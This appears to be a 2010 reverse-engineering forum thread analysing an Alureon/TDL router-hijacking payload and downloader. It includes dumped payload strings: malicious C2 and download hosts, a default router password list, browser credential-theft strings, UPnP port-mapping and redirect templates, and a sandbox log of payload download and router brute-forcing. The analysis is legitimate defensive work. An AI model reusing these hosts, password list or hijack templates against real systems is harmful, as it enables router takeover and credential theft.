A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #3274  by EP_X0FF
 Sun Oct 31, 2010 10:47 am
This sub component of Alureon family looks untrivial :) Seems to be this one what we were talking about long time ago here.
http://www.kernelmode.info/forum/viewto ... =19&p=2696

http://www.virustotal.com/file-scan/rep ... 1288521202

Drops itself as usual through spooler and then uses NtQueueApcThread based injection (ernel32.dll) + NtResumeThread splicing.

As payload - modifies the DHCP registry to point to a malicious DHCP server. Contains list of default passwords (e.g. administrator, router etc).

Run itself as job through Task Scheduler
551ffeb7.job hxxp://www.birungueta.blogspot.com Blog do Birungueta c:\documents and settings\UserName\application data\551ffeb7.exe

Trying to contact few malicious URL's (addresses hardcoded in binary).

Contains some sort of security tools blacklist.
mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exe
Unpacked payload dll internals
CONTENT-LENGTH:
------------------------
index.asp dlink/hwiz.html home.asp wizard.htm login.asp cgi/b/users/switchpopup/ http://%s/%s GET SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d 1406 %s\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d AppEvents\Schemes\Apps\Explorer\Navigating\.current SYSTEM\CurrentControlSet\Control\Class\{72631E54-78A4-11D0-BCF7-00AA00B7B32A}\ %s InfSection cmbatt_inst explorer.exe InstallDate SOFTWARE\Microsoft\Windows NT\CurrentVersion %c-%08X-%X%X%X%X %c-%08X-defaultx 10.0.0.10 about.blank default none %s;%d.%d;%s;%s;%s;%d;%s;%s;%d;%s;%s;%s http\shell\open\command version software\microsoft\internet explorer defaut: %s
ie: %s
nav()
timeout(10000)
java(;)
hxxp://93.174.90.26/bsfk.php die ENDOFBLOCK getgrab ok
advapi32.dll CredFree CredEnumerateA abe2869f-9b47-4cd9-a358-c22904dba7f7 %ws login.php login_fail.php login_auth.asp login_fail.asp login.html firstuse.lp login.lp h t t p : / / % S / % S %s\Software\Microsoft\Internet Explorer\IntelliForms\Storage%d Software\Microsoft\Internet Explorer\IntelliForms\Storage%d %s:%s pstorec.dll PStoreCreateInstance : S t r i n g D a t a Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;airlive;alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;
epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;motorola;mysweex;password1;sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;
vodafone;zoomadsl admin;;root;Admin;1234 CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox 3.5 3.6 \Main %s\%s%s Install Directory mozcrt19.dll sqlite3.dll nspr4.dll plc4.dll
plds4.dll nssutil3.dll softokn3.dll nss3.dll %s\%s NSS_Init PK11_GetInternalKeySlot PK11_Authenticate NSSBase64_DecodeBuffer PK11SDR_Decrypt PK11_FreeSlot NSS_Shutdown
sqlite3_open sqlite3_close sqlite3_prepare_v2 sqlite3_step sqlite3_column_text \Mozilla\Firefox\Profiles\* signons.sqlite select * from moz_logins NetFriendContainer %X
LOCATION: // SERVER: urn:schemas-upnp-org:device:InternetGatewayDevice:1 urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1 239.255.255.250 M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
ST: %s
MAN: "ssdp:discover"
MX: %d

manufacturer modelName modelNumber controlURL http http://%s:%d%s <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetSpecificPortMappingEntry" upnperror <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="%s"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#AddPortMapping" <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="%s"></m:GetExternalIPAddress></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetExternalIPAddress" NewExternalIPAddress POST Content-Type: application/x-www-form-urlencoded %s
%s Authorization: Basic %s http://microsoft.com/ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ %s%s
SeTcbPrivilege %08x %X%X%X%X mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exe iexplore.exe firefox.exe safari.exe opera.exe svchost.exe netsvcs spoolsv.exe spooler \%s.dll <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
%s.manifest open .exe kernel32.dll ernel32.dll LoadLibraryExA T r i g g e r 1 G o o g l e DhcpNameServer NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%s %d.%d.%d.%d,%d.%d.%d.%d WSPStartup msafd mswsock //tag: //img: &q= %s%c%s=%s%s%s Set-Cookie: kw=%s http://google.com/ j.js http://%d.%d.%d.%d/%s?m=4&a=%d&i=%s&u=%s .google. search.yahoo. search.msn. search.live. altavista.com ask.com search.aol. saerch.aol. search.icq. alltheweb.com bing.com yandex.ru rambler.ru go.mail.ru sm.aport.ru /search? /custom? /ie? /url? search. /search results.asp /web/results? /web? /results.php? /yandsearch? /scripts/template.dll? / .youtube. .wikipedia. .yahoo. rds.yahoo. overture. .yimg.com wikimedia. amazon.com hotmail. .msn.com .live.com microsoft. altavista. atdmt.com wzus1.ask. /i/i.gif? opselect.com aolcdn aolsearch .aol. revsci.net atwola. digitalcity. .icq. o.aolcdn.com alltheweb. bing. .yandex. tns-counter. .rambler. .rl0.ru .begun. list.ru .mail.ru z5x.net imgsmail.ru .aport. yadro.ru .ag.ru <html><head><meta http-equiv="refresh" content="10;url=%s">
<script>window.status="%s";</script>
<script src="http://%s:%d/%s?m=3&a=%d&i=%s&u=%s"></script>
Connection: Close
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Content-Length: HTTP/1.1 200 OK
%s%d
%s <script>click="<html><body onLoad='document.main.submit()'>%s<form action='%s' name='main' method='post'";if(top.location==parent.location) click+="target='_parent'";document.write(click+"></body></html>");</script>
HTTP/1.0 307 Temporary Redirect
%s0
Location: %s
Content-Length: ETag: Cookie: kw= & GET results5.google. /url?sa=t&source=web Host: http://%s%s Referer: /favicon.ico dynvolume.com %s\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\ %s\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer | WUStatusServer %d.%dX%s;%d;%d;%s http://%s/kx.php \%s.exe Global\%s %s%d \ernel32.dll UacDisableNotify software\microsoft\Security Center EnableLUA SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System defaultid NtResumeThread
Attachments
pass: malware
(45.17 KiB) Downloaded 76 times
 #3277  by EP_X0FF
 Sun Oct 31, 2010 2:30 pm
Don't have a router at hand this time, so no 100% answer. But looking on code and strings inside payload I think answer will be - yes. It contains code/patterns for D-Link, Linksys routers admin pages and array of default passwords.
Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;airlive;
alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;motorola;mysweex;password1;
sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;vodafone;zoomadsl admin;;root;Admin;1234
 #3881  by EP_X0FF
 Wed Dec 08, 2010 4:07 pm
This is TDL downloader. It does not contain actual rootkit inside, but it works like typical tdl dropper (all hot stuff such as exploit included).
Contains link to
mbreniont.com
InternetConnectA InternetCrackUrlA InternetReadFile HttpOpenRequestA HttpSendRequestAl InternetOpenA InternetCloseHandle
here is the payload
Attachments
pass: malware
(45.78 KiB) Downloaded 52 times
 #3882  by EP_X0FF
 Wed Dec 08, 2010 4:23 pm
Payload is the new version of Alureon routers stuff. It is logical - all series updated their droppers :)
index.asp dlink/hwiz.html home.asp wizard.htm login.asp cgi/b/users/switchpopup/
Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;
airlive;alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;
motorola;mysweex;password1;sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;
vodafone;zoomadsl admin;;root;Admin;1234
 #3888  by PX5
 Wed Dec 08, 2010 9:13 pm
It does something like this....
Code: Select all
2010-12-08 10:33:10 explorer.exe [1552.1784]: CreateProcess( C:\WINDOWS\Temp\irfvjtg.exe ) [3092] 0 kernel32 shell32 user32 comctl32 explorer shlwapi ntdll 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: Detected PE file -> C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: NewPEFile( C:\WINDOWS\system32\spool\prtprocs\w32x86\xuO31m9g.dll ) [3092] 1 kernel32 irfvjtg 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: CopyFile( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll -> c:\gmpot\01CB96ED38934142_xuO31m9g_dll.PE ) 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: CreateSection( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll )
2010-12-08 10:33:11 Idle [1672.3100]: NDIS: 213.163.64.36:80 -> 192.168.2.4:1049 http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1 application/x-msdos-program 73728 <-- PE   1
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: Detected PE file -> C:\WINDOWS\TEMP\OCEIQ7.exe
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: NewPEFile( C:\WINDOWS\Temp\OCEIQ7.exe ) [1672] 2 kernel32 [unknown]  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CopyFile( C:\WINDOWS\TEMP\OCEIQ7.exe -> c:\gmpot\01CB96ED397CE7B6_OCEIQ7_exe.PE ) 
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CreateSection( C:\WINDOWS\TEMP\OCEIQ7.exe )
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CreateProcess( C:\WINDOWS\Temp\OCEIQ7.exe ) [3108] 0 kernel32 advapi32 [unknown] 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: Detected PE file -> C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: NewPEFile( C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe ) [3108] 3 kernel32 oceiq7  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CopyFile( C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe -> c:\gmpot\01CB96ED398FFA86_21d2f7f1_exe.PE ) 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: Detected PE file -> C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: NewPEFile( C:\WINDOWS\system32\spool\prtprocs\w32x86\aAAA3179.dll ) [3108] 4 kernel32 oceiq7  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CopyFile( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll -> c:\gmpot\01CB96ED39925CE0_aAAA3179_dll.PE ) 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CreateSection( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll )
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: Detected PE file -> C:\WINDOWS\system32\ernel32.dll
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: NewPEFile( C:\WINDOWS\system32\ernel32.dll ) [1672] 5 kernel32 [unknown]  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: CopyFile( C:\WINDOWS\system32\ernel32.dll -> c:\gmpot\01CB96ED3A099274_ernel32_dll.PE ) 
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: CreateSection( C:\WINDOWS\system32\ernel32.dll )
2010-12-08 10:33:13 Idle [1672.3124]: NDIS: 207.46.232.182:80 -> 192.168.2.4:1051 http://microsoft.com/ text/html 23   2
2010-12-08 10:33:13 spoolsv.exe [1672.3124]: SaveHttp( http://microsoft.com/ -> c:\gmpot\TEMP\01CB96ED3A49F1F2_microsoft_com )
2010-12-08 10:33:14 Idle [1672.3124]: NDIS: 65.55.12.249:80 -> 192.168.2.4:1052 http://www.microsoft.com/ text/html 1020   3
2010-12-08 10:33:14 spoolsv.exe [1672.3124]: SaveHttp( http://www.microsoft.com/ -> c:\gmpot\TEMP\01CB96ED3A6B52DE_www_microsoft_com )
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1058 http://192.168.2.1/index.asp  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1059 http://192.168.2.1/dlink/hwiz.html  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1060 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1061 http://192.168.2.1/  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1062 http://192.168.2.1/home.asp  0   4
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1063 http://192.168.2.1/wizard.htm  0   5
2010-12-08 10:34:02 gmpot.exe [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1064 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1065 http://192.168.2.1/login.asp  0   3
2010-12-08 10:34:02 gmpot.exe [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1066 http://192.168.2.1/cgi/b/users/switchpopup/  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1067 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1068 http://192.168.2.1/index.asp  0   3
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1069 http://192.168.2.1/dlink/hwiz.html  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1070 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1071 http://192.168.2.1/  0   3
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1072 http://192.168.2.1/home.asp  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1073 http://192.168.2.1/wizard.htm  0   5
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1074 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1075 http://192.168.2.1/login.asp  0   3
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1076 http://192.168.2.1/cgi/b/users/switchpopup/  0   4
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1077 http://192.168.2.1/login.stm  0   2

Then makes job file pointing to this--> C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe

Captured files attached.
Attachments
(210.89 KiB) Downloaded 57 times